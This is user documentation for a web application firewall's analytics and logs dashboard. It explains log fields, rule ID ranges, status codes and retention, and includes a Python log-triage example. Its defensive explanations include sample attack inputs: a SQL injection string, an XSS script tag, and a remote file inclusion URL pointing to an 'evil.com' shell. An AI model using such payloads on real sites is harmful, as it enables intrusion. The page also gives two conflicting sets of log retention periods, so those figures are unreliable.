Analytics & Logs
The Analytics tab provides real-time insights into your website traffic, security events, and WAF activity.
Traffic Statistics
Overview Metrics
Total Requests: Total number of HTTP requests received by your site.
Unique Visitors: Number of unique IP addresses that accessed your site.
Blocked Requests: Number of requests blocked by WAF, rate limiting, or access control.
Attack Types: Breakdown of detected attack patterns.
WAF Logs
WAF logs show security events where the Web Application Firewall blocked or detected malicious requests.
Log Fields
Timestamp: When the event occurred (in your timezone).
IP Address: The attacker’s IP address.
Rule ID: The WAF rule that triggered (e.g., 920100).
Message: Description of the attack detected.
URI: The URL path that was attacked.
Group: Which WAF ruleset detected the attack (OWASP CRS, WordPress, etc.).
Understanding WAF Logs
High rule IDs (900000+): OWASP Core Rule Set detections
Medium rule IDs (200000+): WordPress-specific rules
Low rule IDs: Custom or Comodo rules
Common Attack Types
SQL Injection (942xxx rules)
- Attempts to inject SQL commands into your database
- Example: ?id=1' OR '1'='1
Cross-Site Scripting (941xxx rules)
- Attempts to inject malicious JavaScript
- Example: <script>alert('XSS')</script>
Remote File Inclusion (931xxx rules)
- Attempts to include remote files
- Example: ?page=http://evil.com/shell.php
Scanner Detection (913xxx rules)
- Automated security scanners probing your site
- Example: Nikto, SQLMap, etc.
Access Logs
Access logs show all HTTP requests to your site, including both legitimate and blocked traffic.
Log Fields
Timestamp: When the request was made.
IP Address: The visitor’s IP address.
Method: HTTP method (GET, POST, PUT, DELETE).
URI: The requested URL path.
Status Code: HTTP response code (200, 403, 404, etc.).
User Agent: The visitor’s browser/client information.
HTTP Status Codes
2xx Success
- 200 OK: Request succeeded
- 201 Created: Resource created successfully
3xx Redirection
- 301 Moved Permanently: Permanent redirect
- 302 Found: Temporary redirect
4xx Client Errors
- 400 Bad Request: Malformed request
- 403 Forbidden: Access denied (blocked by WAF/access control)
- 404 Not Found: Resource doesn’t exist
- 429 Too Many Requests: Rate limit exceeded
5xx Server Errors
- 500 Internal Server Error: Backend server error
- 502 Bad Gateway: Backend server unreachable
- 503 Service Unavailable: Server overloaded
Filtering Logs
Use the date filters to view logs for specific time periods:
Date Range: Select start and end dates to filter logs.
Quick Filters: Today, Yesterday, Last 7 Days, Last 30 Days.
Search: Search for specific IPs, URIs, or rule IDs.
Exporting Logs
You can export logs for analysis or compliance:
- Set your desired date range
- Click the Export button
- Choose format (CSV, JSON)
- Download the file
Use cases:
- Security audits
- Compliance reporting
- Incident investigation
- Performance analysis
Charts & Visualizations
Traffic Over Time
Line chart showing request volume over time. Helps identify:
- Traffic patterns
- Attack spikes
- Unusual activity
Top Attackers
Bar chart showing IPs with the most blocked requests. Helps identify:
- Persistent attackers
- IPs to blacklist
- Attack sources
Attack Types Distribution
Pie chart showing breakdown of attack types. Helps identify:
- Most common attacks
- Rule effectiveness
- Security priorities
Geographic Distribution
Map showing request origins by country. Helps identify:
- Legitimate traffic sources
- Attack origins
- Geographic patterns
Best Practices
- Review logs daily – Check for new attack patterns
- Investigate 403 errors – May indicate false positives
- Monitor top attackers – Consider blacklisting persistent IPs
- Export logs regularly – For compliance and long-term analysis
- Set up alerts – Get notified of unusual activity (coming soon)
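The log review described above can be scripted against an exported JSON file. The following is an added example, not Atomic Edge code: it classifies each event with the rule ID ranges listed on this page, counts events per source IP, and flags rule/URI pairs triggered by several different IPs as false-positive candidates. The JSON field names (ip, rule_id, uri), the sample records and the threshold fp_min_ips are assumptions.

```python
import json
from collections import Counter, defaultdict

# Attack families by rule-ID prefix, as listed on this page.
FAMILIES = {"942": "SQL Injection", "941": "Cross-Site Scripting",
            "931": "Remote File Inclusion", "913": "Scanner Detection"}

def classify(rule_id):
    """Map a rule ID to (ruleset, attack family) using this page's ID ranges."""
    rid = int(rule_id)
    if rid >= 900000:
        return "OWASP CRS", FAMILIES.get(str(rid)[:3], "Other")
    if rid >= 200000:
        return "WordPress", "Other"
    return "Custom/Comodo", "Other"

def triage(records, fp_min_ips=3):
    """Summarise WAF events: busiest source IPs, families, false-positive candidates."""
    per_ip, families = Counter(), Counter()
    ips_by_rule_uri = defaultdict(set)
    for r in records:
        per_ip[r["ip"]] += 1
        families[classify(r["rule_id"])[1]] += 1
        ips_by_rule_uri[(int(r["rule_id"]), r["uri"])].add(r["ip"])
    # The same rule firing on the same URI for many different IPs usually means
    # a legitimate site feature trips the rule; review it before blacklisting.
    fp = sorted(k for k, ips in ips_by_rule_uri.items() if len(ips) >= fp_min_ips)
    return {"top_ips": per_ip.most_common(3),
            "families": dict(families),
            "fp_candidates": fp}

# Constructed sample export: field names, IPs (documentation ranges) and the
# WordPress-range rule ID 210500 are assumptions, not taken from a real export.
SAMPLE = json.loads("""[
 {"ip": "203.0.113.7",   "rule_id": 942100, "uri": "/product.php"},
 {"ip": "203.0.113.7",   "rule_id": 941100, "uri": "/search"},
 {"ip": "203.0.113.7",   "rule_id": 913100, "uri": "/"},
 {"ip": "203.0.113.7",   "rule_id": 931100, "uri": "/index.php"},
 {"ip": "198.51.100.10", "rule_id": 210500, "uri": "/wp-admin/admin-ajax.php"},
 {"ip": "198.51.100.11", "rule_id": 210500, "uri": "/wp-admin/admin-ajax.php"},
 {"ip": "198.51.100.12", "rule_id": 210500, "uri": "/wp-admin/admin-ajax.php"}
]""")

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

An IP that triggers several attack families is a blacklist candidate, while a rule/URI pair in fp_candidates is one to review for tuning first.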
Troubleshooting
Logs not appearing
- Check that DNS is properly configured
- Verify traffic is flowing through Atomic Edge
- Wait a few minutes for logs to process
Too many false positives
- Review WAF logs to identify problematic rules
- Disable specific rules causing issues
- Contact support for rule tuning
Missing legitimate traffic
- Check if IPs are blacklisted
- Verify geographic restrictions
- Review rate limiting settings
Data Retention
Log retention periods:
- WAF Logs: 90 days
- Access Logs: 30 days
- Traffic Statistics: 1 year
Important: Export logs if you need longer retention for compliance.
Privacy & Compliance
Atomic Edge logs contain:
- IP addresses (personal data under GDPR)
- Request details (URLs, user agents)
- Timestamps
Compliance considerations:
- Logs are stored securely and encrypted
- Access is restricted to your account
- You can export and delete logs as needed
- IP addresses can be anonymized on request
GDPR compliance:
- Logs are necessary for security purposes (legitimate interest)
- You are the data controller for your site’s logs
- Users can request their data through you
Frequently Asked Questions
What traffic statistics does Atomic Edge provide?
Understanding your analytics dashboard
Atomic Edge tracks total requests, unique visitors (by IP), blocked requests (WAF, rate limiting, access control), and attack type breakdown. View hourly, daily, or monthly trends. The Analytics tab provides real-time insights into your traffic patterns and security events.
How do I read WAF logs?
Understanding WAF log fields and data
WAF logs show: Timestamp (when event occurred), IP Address (attacker’s IP), Rule ID (WAF rule triggered, e.g., 920100), Message (attack description), URI (attacked URL path), and Group (ruleset that detected it: OWASP CRS, WordPress, etc.).
What do WAF rule ID numbers mean?
Decoding WAF rule identification
Rule IDs indicate the detection source: 900000+ are OWASP Core Rule Set, 200000+ are WordPress-specific rules, lower IDs are custom or Comodo rules. Examples: 942xxx = SQL Injection, 941xxx = Cross-Site Scripting (XSS), 931xxx = Remote File Inclusion, 913xxx = Scanner Detection.
What are access logs?
HTTP request logging overview
Access logs show all HTTP requests to your site, including legitimate traffic and blocked requests. Fields: Timestamp, IP Address, HTTP Method (GET/POST/etc.), URI, Status Code (200, 403, 404, etc.), and User Agent (browser/client info). Use these for traffic analysis and debugging.
What do HTTP status codes mean in my logs?
Understanding response code categories
2xx = Success (200 OK, 201 Created). 3xx = Redirects (301 Permanent, 302 Temporary). 4xx = Client errors (400 Bad Request, 403 Forbidden/blocked, 404 Not Found, 429 Rate Limited). 5xx = Server errors (500 Internal Error, 502 Bad Gateway, 503 Unavailable).
How do I filter and search my logs?
Finding specific log entries
Use the search/filter controls to narrow results by IP address, URI path, rule ID, ruleset group, status code, or date range. This helps identify attack patterns, troubleshoot blocked legitimate traffic, or analyze specific user sessions.
What is SQL Injection and how is it detected?
Understanding SQL injection attacks (942xxx rules)
SQL injection attempts to inject malicious SQL commands into your database through user input. Example: ?id=1' OR '1'='1. WAF rules 942xxx detect these patterns. If you see these in logs, your WAF is blocking database attacks; no action is needed unless it’s a false positive.
What is Cross-Site Scripting (XSS)?
Understanding XSS attacks (941xxx rules)
XSS attacks inject malicious JavaScript into pages viewed by other users. Example: <script>alert('XSS')</script>. WAF rules 941xxx detect these. Blocked XSS attempts appear in logs when attackers try to compromise your visitors’ browsers through your site.
How long are logs retained?
Log data retention policies
Log retention varies by plan tier. Free plans retain logs for 7 days. Advanced plans retain 30 days. Enterprise plans have configurable retention up to 90 days. Export logs if you need longer retention for compliance or forensic purposes.
What is scanner detection (913xxx rules)?
Identifying automated security scanners
Scanner detection rules (913xxx) identify automated tools probing your site for vulnerabilities, such as Nikto, SQLMap, Nmap, and similar. High scanner activity may indicate targeted reconnaissance. Block these IPs or enable captcha challenges to deter automated attacks.
